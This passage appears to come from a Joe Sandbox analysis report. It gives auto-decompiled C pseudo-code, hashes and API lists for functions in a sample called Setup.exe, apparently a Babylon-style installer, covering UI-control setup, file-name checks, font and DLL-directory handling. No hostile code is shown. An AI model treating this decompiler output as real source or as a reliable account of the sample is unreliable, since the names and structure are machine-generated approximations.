                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: b8bd37fcb15f34cd53e11df0cd1955b9fc464ef3865191caa10b3315eeb2d2cc
                                                                                                                                                              • Instruction ID: e5d37839dca9f35039a431e2513190f11395736884d950e5dcdd22d0a0dad3d5
                                                                                                                                                              • Opcode Fuzzy Hash: b8bd37fcb15f34cd53e11df0cd1955b9fc464ef3865191caa10b3315eeb2d2cc
                                                                                                                                                              • Instruction Fuzzy Hash: 7EE1B7F5E00144AFDB04EFA1E8829AF7376AF89308F14446DF8155B352DA39ED11CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00409BF0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 156COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00409BF0(struct HWND__* _a4, int _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, char* _a24) {
				char _v8;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HWND__* _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				char* _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				signed int _t71;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				void* _t102;
				void* _t141;
				signed int _t142;
				void* _t143;
				void* _t144;
				void* _t145;

				_push(0xffffffff);
				_push(0x5183f8);
				_push( *[fs:0x0]);
				_t144 = _t143 - 0x34;
				_t71 =  *0x561244; // 0xddd124f9
				_push(_t71 ^ _t142);
				 *[fs:0x0] =  &_v16;
				_t149 = _a8 - 0xffffffff;
				if(_a8 != 0xffffffff) {
					_v48 = GetDlgItem(_a4, _a8);
				} else {
					_v48 = _a4;
				}
				E0040A2C0( &_v28, _t141, _t149, _v48);
				E00414C90();
				_v8 = 0;
				_v24 = E0040A2F0( &_v28, 0x53b524, 0, E00434050( &_v32));
				if(_v24 >= 0) {
					_push(L"BabCtrl :: control created..");
					E004CC5C0(_t79);
					_t145 = _t144 + 4;
					__eflags = _a16;
					if(_a16 == 0) {
						_v52 = 0x80070057;
					} else {
						_v52 = E0040A320( &_v28, _a16);
					}
					_t81 = _v52;
					_v24 = _v52;
					__eflags = _v24;
					if(_v24 < 0) {
						_push(L"BabCtr:: fail to set uihandler");
						_t81 = E004CC5C0(_t81);
						_t145 = _t145 + 4;
					}
					_push(L"BabCtrl :: set external OK ..");
					E004CC5C0(_t81);
					__eflags = _a20;
					if(_a20 != 0) {
						E0040A5D0(E0041D530( &_v32));
						_v8 = 1;
						_t97 = E0041D530( &_v36);
						__eflags = _t97;
						if(_t97 == 0) {
							_push(L"BabCtrl :: set host Failed ..");
							E004CC5C0(_t97);
						} else {
							_v56 = E0041D530( &_v36);
							_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0xc))))(_v56, _a20);
							_push(L"BabCtrl :: set Host OK ..");
							E004CC5C0(_t102);
						}
						_v8 = 0;
						E00439240();
					}
					E0040A640(E0041D530( &_v32));
					_v8 = 2;
					_t85 = E0041D530( &_v20);
					__eflags = _t85;
					if(_t85 != 0) {
						__eflags = _a24;
						if(_a24 == 0) {
							_v60 = L"SHELL.Explorer";
						} else {
							_v60 = _a24;
						}
						_v64 = E0041D530( &_v20);
						_t56 =  *_v64 + 0xc; // 0x780045
						 *((intOrPtr*)( *_t56))(_v64, _v60, _a4, 0);
					}
					__eflags = _a12;
					if(_a12 == 0) {
						_v68 = 0x80070057;
					} else {
						_v68 = E0040A960( &_v28, _a12);
					}
					_v44 = _v68;
					_v8 = 0;
					E00439240();
					_v8 = 0xffffffff;
					E0040D320();
					_t88 = _v44;
				} else {
					_v40 = _v24;
					_v8 = 0xffffffff;
					E0040D320();
					_t88 = _v40;
				}
				 *[fs:0x0] = _v16;
				return _t88;
			}




























                                                                                                                                                              0x00409bf3
                                                                                                                                                              0x00409bf5
                                                                                                                                                              0x00409c00
                                                                                                                                                              0x00409c01
                                                                                                                                                              0x00409c04
                                                                                                                                                              0x00409c0b
                                                                                                                                                              0x00409c0f
                                                                                                                                                              0x00409c15
                                                                                                                                                              0x00409c19
                                                                                                                                                              0x00409c31
                                                                                                                                                              0x00409c1b
                                                                                                                                                              0x00409c1e
                                                                                                                                                              0x00409c1e
                                                                                                                                                              0x00409c3b
                                                                                                                                                              0x00409c43
                                                                                                                                                              0x00409c48
                                                                                                                                                              0x00409c67
                                                                                                                                                              0x00409c6e
                                                                                                                                                              0x00409c8d
                                                                                                                                                              0x00409c92
                                                                                                                                                              0x00409c97
                                                                                                                                                              0x00409c9a
                                                                                                                                                              0x00409c9e
                                                                                                                                                              0x00409cb1
                                                                                                                                                              0x00409ca0
                                                                                                                                                              0x00409cac
                                                                                                                                                              0x00409cac
                                                                                                                                                              0x00409cb8
                                                                                                                                                              0x00409cbb
                                                                                                                                                              0x00409cbe
                                                                                                                                                              0x00409cc2
                                                                                                                                                              0x00409cc4
                                                                                                                                                              0x00409cc9
                                                                                                                                                              0x00409cce
                                                                                                                                                              0x00409cce
                                                                                                                                                              0x00409cd1
                                                                                                                                                              0x00409cd6
                                                                                                                                                              0x00409cde
                                                                                                                                                              0x00409ce2
                                                                                                                                                              0x00409cf0
                                                                                                                                                              0x00409cf5
                                                                                                                                                              0x00409cfc
                                                                                                                                                              0x00409d01
                                                                                                                                                              0x00409d03
                                                                                                                                                              0x00409d31
                                                                                                                                                              0x00409d36
                                                                                                                                                              0x00409d05
                                                                                                                                                              0x00409d0d
                                                                                                                                                              0x00409d20
                                                                                                                                                              0x00409d22
                                                                                                                                                              0x00409d27
                                                                                                                                                              0x00409d2c
                                                                                                                                                              0x00409d3e
                                                                                                                                                              0x00409d45
                                                                                                                                                              0x00409d45
                                                                                                                                                              0x00409d56
                                                                                                                                                              0x00409d5b
                                                                                                                                                              0x00409d62
                                                                                                                                                              0x00409d67
                                                                                                                                                              0x00409d69
                                                                                                                                                              0x00409d6b
                                                                                                                                                              0x00409d6f
                                                                                                                                                              0x00409d79
                                                                                                                                                              0x00409d71
                                                                                                                                                              0x00409d74
                                                                                                                                                              0x00409d74
                                                                                                                                                              0x00409d88
                                                                                                                                                              0x00409d9e
                                                                                                                                                              0x00409da1
                                                                                                                                                              0x00409da1
                                                                                                                                                              0x00409da3
                                                                                                                                                              0x00409da7
                                                                                                                                                              0x00409dba
                                                                                                                                                              0x00409da9
                                                                                                                                                              0x00409db5
                                                                                                                                                              0x00409db5
                                                                                                                                                              0x00409dc4
                                                                                                                                                              0x00409dc7
                                                                                                                                                              0x00409dce
                                                                                                                                                              0x00409dd3
                                                                                                                                                              0x00409ddd
                                                                                                                                                              0x00409de2
                                                                                                                                                              0x00409c70
                                                                                                                                                              0x00409c73
                                                                                                                                                              0x00409c76
                                                                                                                                                              0x00409c80
                                                                                                                                                              0x00409c85
                                                                                                                                                              0x00409c85
                                                                                                                                                              0x00409de8
                                                                                                                                                              0x00409df3

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item
                                                                                                                                                              • String ID: BabCtr:: fail to set uihandler$BabCtrl :: control created..$BabCtrl :: set Host OK ..$BabCtrl :: set external OK ..$BabCtrl :: set host Failed ..$W$W
                                                                                                                                                              • API String ID: 3207170592-2923569185
                                                                                                                                                              • Opcode ID: c5f6a6eb2dd4e3054d342fafb51bad6f9197b658f9e0fcfc39563db65e5f1383
                                                                                                                                                              • Instruction ID: eaf740cecb094d001f17b7b0570d5d8f32ad036a3cbaf856ee7f5ccacbc46b22
                                                                                                                                                              • Opcode Fuzzy Hash: c5f6a6eb2dd4e3054d342fafb51bad6f9197b658f9e0fcfc39563db65e5f1383
                                                                                                                                                              • Instruction Fuzzy Hash: 6F614C71D00209EBDB04EFA5D881AEEB7B0BF58318F10812EE416772D1EB386E45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004CE260 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004CE260(WCHAR* _a4) {
				signed short* _v8;
				WCHAR* _v12;
				signed short* _v16;
				WCHAR* _v20;

				_v8 = 0;
				_v12 = PathFindFileNameW(_a4);
				_v20 = PathFindExtensionW(_a4);
				_t49 = _v12;
				if(E00452779(_v12, _v12, L"bab", 3) != 0 || E00452266(_t49, _v20, L".dat") != 0) {
					return 0;
				} else {
					_v16 = 0;
					if(_v20 - _v12 >> 1 != 5) {
						_v8 = E00451CBD(_v12 + 6,  &_v16, 0xa);
						if(_v8 <= 0 || _v16 != _v12 + 0xc || ( *_v16 & 0x0000ffff) != 0x2e) {
							_v8 = 0;
						}
					} else {
						_v8 = E00451CBD(_v12 + 6,  &_v16, 0x10);
						if(_v8 <= 0 || _v16 != _v20) {
							_v8 = 0;
						}
					}
					return _v8;
				}
			}







                                                                                                                                                              0x004ce266
                                                                                                                                                              0x004ce277
                                                                                                                                                              0x004ce284
                                                                                                                                                              0x004ce28e
                                                                                                                                                              0x004ce29c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004ce2ba
                                                                                                                                                              0x004ce2ba
                                                                                                                                                              0x004ce2cc
                                                                                                                                                              0x004ce312
                                                                                                                                                              0x004ce319
                                                                                                                                                              0x004ce331
                                                                                                                                                              0x004ce331
                                                                                                                                                              0x004ce2ce
                                                                                                                                                              0x004ce2e3
                                                                                                                                                              0x004ce2ea
                                                                                                                                                              0x004ce2f4
                                                                                                                                                              0x004ce2f4
                                                                                                                                                              0x004ce2fb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004ce338

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FindPath__wcstoi64$ExtensionFileName__wcsicoll__wcsnicmpwcstoxl
                                                                                                                                                              • String ID: .dat$bab
                                                                                                                                                              • API String ID: 449826006-2189697214
                                                                                                                                                              • Opcode ID: 6e201137cf9664afb1ec1b3c086d1d47f06f8660c52b2b8d762d5414cb5a3b35
                                                                                                                                                              • Instruction ID: df4a38ea496df72c73f4a7d825426fae90e2c63b5b2ab31b804925f12fd1acf7
                                                                                                                                                              • Opcode Fuzzy Hash: 6e201137cf9664afb1ec1b3c086d1d47f06f8660c52b2b8d762d5414cb5a3b35
                                                                                                                                                              • Instruction Fuzzy Hash: 58217C75D00208EBDF40DFA9C985FAEB7B8AF04304F14849EE802A7381E778AB45CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004244C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004244C0(signed char _a4) {
				struct HDC__* _v8;
				struct HFONT__* _v12;
				void* _v16;
				int _v20;

				_t1 =  &_a4; // 0x42467e
				if(( *_t1 & 0x000000ff) != 0) {
					_t2 =  &_a4; // 0x42467e
					_v12 = CreateFontW(0, 0, 0, 0, 0, 0, 0, 0,  *_t2 & 0x000000ff, 0, 0, 0, 0, 0);
					if(_v12 != 0) {
						_v8 = GetDC(0);
						_v16 = SelectObject(_v8, _v12);
						_v20 = GetTextCharset(_v8);
						SelectObject(_v8, _v16);
						ReleaseDC(0, _v8);
						DeleteObject(_v12);
						if(_v20 == (_a4 & 0x000000ff)) {
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 1;
			}







                                                                                                                                                              0x004244c6
                                                                                                                                                              0x004244cc
                                                                                                                                                              0x004244e2
                                                                                                                                                              0x004244fd
                                                                                                                                                              0x00424504
                                                                                                                                                              0x00424512
                                                                                                                                                              0x00424523
                                                                                                                                                              0x00424530
                                                                                                                                                              0x0042453b
                                                                                                                                                              0x00424547
                                                                                                                                                              0x00424551
                                                                                                                                                              0x0042455e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424564
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424560
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424506
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,~FB,00000000,00000000,00000000,00000000,00000000), ref: 004244F7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFont
                                                                                                                                                              • String ID: ~FB
                                                                                                                                                              • API String ID: 1830492434-2682213495
                                                                                                                                                              • Opcode ID: 2761a6f0ecc8792617914d0c4bf0b4833e8627f24a0be996a018f82cc7637a97
                                                                                                                                                              • Instruction ID: f253bb138a9ababeb2fa7b0379442bbb036eb631f144d967374e47d3ec1cdec6
                                                                                                                                                              • Opcode Fuzzy Hash: 2761a6f0ecc8792617914d0c4bf0b4833e8627f24a0be996a018f82cc7637a97
                                                                                                                                                              • Instruction Fuzzy Hash: 68115178A04218FFDB40DFB4D848BAEBBB4EB48741F108496F959D6240D7749A84AB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004250E0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004250E0(WCHAR* _a4) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				int _v16;
				_Unknown_base(*)()* _v20;

				_v16 = 0;
				_v8 = 0;
				_v12 = LoadLibraryW(L"Kernel32.dll");
				if(_v12 == 0) {
					L4:
					if(_v8 == 0) {
						if(_a4 == 0) {
							if(( *0x5c1cc0 & 0x0000ffff) != 0) {
								_v16 = SetCurrentDirectoryW(0x5c1cc0);
								 *0x5c1cc0 = 0;
							}
						} else {
							GetCurrentDirectoryW(0x104, 0x5c1cc0);
							_v16 = SetCurrentDirectoryW(_a4);
						}
					}
					return _v16;
				}
				_v20 = GetProcAddress(_v12, "SetDllDirectoryW");
				if(_v20 != 0) {
					_v8 = 1;
					_v16 = _v20(_a4);
				}
				FreeLibrary(_v12);
				goto L4;
			}







                                                                                                                                                              0x004250e6
                                                                                                                                                              0x004250ed
                                                                                                                                                              0x004250ff
                                                                                                                                                              0x00425106
                                                                                                                                                              0x0042513b
                                                                                                                                                              0x0042513f
                                                                                                                                                              0x00425145
                                                                                                                                                              0x0042516f
                                                                                                                                                              0x0042517c
                                                                                                                                                              0x00425181
                                                                                                                                                              0x00425181
                                                                                                                                                              0x00425147
                                                                                                                                                              0x00425151
                                                                                                                                                              0x00425161
                                                                                                                                                              0x00425161
                                                                                                                                                              0x00425145
                                                                                                                                                              0x0042518e
                                                                                                                                                              0x0042518e
                                                                                                                                                              0x00425117
                                                                                                                                                              0x0042511e
                                                                                                                                                              0x00425120
                                                                                                                                                              0x0042512e
                                                                                                                                                              0x0042512e
                                                                                                                                                              0x00425135
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 004250F9
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00425111
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00425135
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,005C1CC0), ref: 00425151
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0042515B
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(005C1CC0), ref: 00425176
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectory$Library$AddressFreeLoadProc
                                                                                                                                                              • String ID: Kernel32.dll$SetDllDirectoryW
                                                                                                                                                              • API String ID: 3848618540-1456639573
                                                                                                                                                              • Opcode ID: 2989dd36ad0d2758a2f63e4a7fb8f6b3e931af6ca2f0ad55cefa333f08e1b958
                                                                                                                                                              • Instruction ID: b34450486e86290ed816555a2d0d734a9eab7f8567511d1e9733fc25535bb76a
                                                                                                                                                              • Opcode Fuzzy Hash: 2989dd36ad0d2758a2f63e4a7fb8f6b3e931af6ca2f0ad55cefa333f08e1b958
                                                                                                                                                              • Instruction Fuzzy Hash: E611F878E40618FFEB10DFA4D858BEEBBB0BF18341F408559E811A3291D7B84A98DB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F3ED0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 148windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E004F3ED0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, signed int _a8) {
				long _v8;
				char _v16;
				signed int _v20;
				signed int _v21;
				short _v32;
				char _v40;
				short _v48;
				char _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				signed int _t61;
				long _t78;
				struct HWND__* _t79;
				signed int _t84;
				signed int _t95;
				void* _t97;
				intOrPtr _t120;
				void* _t136;
				void* _t137;
				signed int _t138;

				_t137 = __esi;
				_t136 = __edi;
				_t97 = __ebx;
				_push(0xffffffff);
				_push(0x512e3f);
				_push( *[fs:0x0]);
				_t61 =  *0x561244; // 0xddd124f9
				_push(_t61 ^ _t138);
				 *[fs:0x0] =  &_v16;
				_v68 = __ecx;
				_v20 = E00404310( *(_v68 + 0x48));
				if(_a8 == 0xfffffffe) {
					_v20 = _v20 * 0xffffffff;
				}
				if(_a8 != 0) {
					L9:
					__eflags = _a8;
					if(_a8 == 0) {
						L11:
						E00416910( &_v56, 0);
						_v8 = 1;
						 *((intOrPtr*)( *((intOrPtr*)( *( *(_v68 + 0x48)) + 0x80))))( *(_v68 + 0x48), L"dontAskAbort", 0, 0,  &_v56);
						__eflags = _v48;
						if(_v48 != 0) {
							L14:
							_v8 = 0xffffffff;
							E00417430( &_v56);
							L15:
							_v21 = E00404A30(E004049B0());
							E004E6960(E004049B0(), 2);
							 *(_v68 + 0x48) = 0;
							E00415F10(_v68);
							__eflags = _a8 - 1;
							if(_a8 != 1) {
								__eflags = _v21 & 0x000000ff;
								if((_v21 & 0x000000ff) == 0) {
									_t79 =  *0x5bdd34; // 0x80078
									PostMessageW(_t79, 0x10, _v20, 0);
								}
							}
							_t78 = 0;
							__eflags = 0;
							L19:
							 *[fs:0x0] = _v16;
							return _t78;
						}
						E004E6960(E004049B0(), 0);
						_t84 = E004E40D0(_t97, _t136, _t137, __eflags,  *((intOrPtr*)(_v68 + 4)), _v20);
						__eflags = _t84;
						if(_t84 != 0) {
							goto L14;
						}
						E004E6960(E004049B0(), 1);
						E00415F30( *(_v68 + 0x48) + 0x84);
						_v64 = 0;
						_v8 = 0xffffffff;
						E00417430( &_v56);
						_t78 = _v64;
						goto L19;
					}
					__eflags = _a8 - 0xffffffff;
					if(_a8 != 0xffffffff) {
						goto L15;
					}
					goto L11;
				}
				E00416910( &_v40, 0);
				_v8 = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *( *(_v68 + 0x48)) + 0x80))))( *(_v68 + 0x48), L"onXBtnPress", 0, 0,  &_v40);
				if(_v32 == 0) {
					_t120 = _v68;
					__eflags =  *(_t120 + 0x4c);
					if( *(_t120 + 0x4c) != 0) {
						_t95 = E004161A0( *((intOrPtr*)(_v68 + 0x4c)) + 0x84);
						__eflags = _t95;
						if(_t95 != 0) {
							_v20 = 0;
						}
					}
					_v8 = 0xffffffff;
					E00417430( &_v40);
					goto L9;
				}
				_v60 = 0;
				_v8 = 0xffffffff;
				E00417430( &_v40);
				_t78 = _v60;
				goto L19;
			}
























                                                                                                                                                              0x004f3ed0
                                                                                                                                                              0x004f3ed0
                                                                                                                                                              0x004f3ed0
                                                                                                                                                              0x004f3ed3
                                                                                                                                                              0x004f3ed5
                                                                                                                                                              0x004f3ee0
                                                                                                                                                              0x004f3ee4
                                                                                                                                                              0x004f3eeb
                                                                                                                                                              0x004f3eef
                                                                                                                                                              0x004f3ef5
                                                                                                                                                              0x004f3f03
                                                                                                                                                              0x004f3f0a
                                                                                                                                                              0x004f3f12
                                                                                                                                                              0x004f3f12
                                                                                                                                                              0x004f3f19
                                                                                                                                                              0x004f3fae
                                                                                                                                                              0x004f3fae
                                                                                                                                                              0x004f3fb2
                                                                                                                                                              0x004f3fbe
                                                                                                                                                              0x004f3fc3
                                                                                                                                                              0x004f3fc8
                                                                                                                                                              0x004f3ff1
                                                                                                                                                              0x004f3ff7
                                                                                                                                                              0x004f3ff9
                                                                                                                                                              0x004f405a
                                                                                                                                                              0x004f405a
                                                                                                                                                              0x004f4064
                                                                                                                                                              0x004f4069
                                                                                                                                                              0x004f4075
                                                                                                                                                              0x004f4081
                                                                                                                                                              0x004f4089
                                                                                                                                                              0x004f4093
                                                                                                                                                              0x004f4098
                                                                                                                                                              0x004f409c
                                                                                                                                                              0x004f40a2
                                                                                                                                                              0x004f40a4
                                                                                                                                                              0x004f40ae
                                                                                                                                                              0x004f40b4
                                                                                                                                                              0x004f40b4
                                                                                                                                                              0x004f40a4
                                                                                                                                                              0x004f40ba
                                                                                                                                                              0x004f40ba
                                                                                                                                                              0x004f40bc
                                                                                                                                                              0x004f40bf
                                                                                                                                                              0x004f40ca
                                                                                                                                                              0x004f40ca
                                                                                                                                                              0x004f4004
                                                                                                                                                              0x004f4014
                                                                                                                                                              0x004f401c
                                                                                                                                                              0x004f401e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f4029
                                                                                                                                                              0x004f403a
                                                                                                                                                              0x004f403f
                                                                                                                                                              0x004f4046
                                                                                                                                                              0x004f4050
                                                                                                                                                              0x004f4055
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f4055
                                                                                                                                                              0x004f3fb4
                                                                                                                                                              0x004f3fb8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f3fb8
                                                                                                                                                              0x004f3f24
                                                                                                                                                              0x004f3f29
                                                                                                                                                              0x004f3f52
                                                                                                                                                              0x004f3f5a
                                                                                                                                                              0x004f3f7a
                                                                                                                                                              0x004f3f7d
                                                                                                                                                              0x004f3f81
                                                                                                                                                              0x004f3f8f
                                                                                                                                                              0x004f3f94
                                                                                                                                                              0x004f3f96
                                                                                                                                                              0x004f3f98
                                                                                                                                                              0x004f3f98
                                                                                                                                                              0x004f3f96
                                                                                                                                                              0x004f3f9f
                                                                                                                                                              0x004f3fa9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f3fa9
                                                                                                                                                              0x004f3f5c
                                                                                                                                                              0x004f3f63
                                                                                                                                                              0x004f3f6d
                                                                                                                                                              0x004f3f72
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F3FFD
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F4022
                                                                                                                                                                • Part of subcall function 004161A0: IsWindow.USER32(005C21C8), ref: 004161AD
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F4069
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F407A
                                                                                                                                                              • PostMessageW.USER32(00080078,00000010,00000010,00000000), ref: 004F40B4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
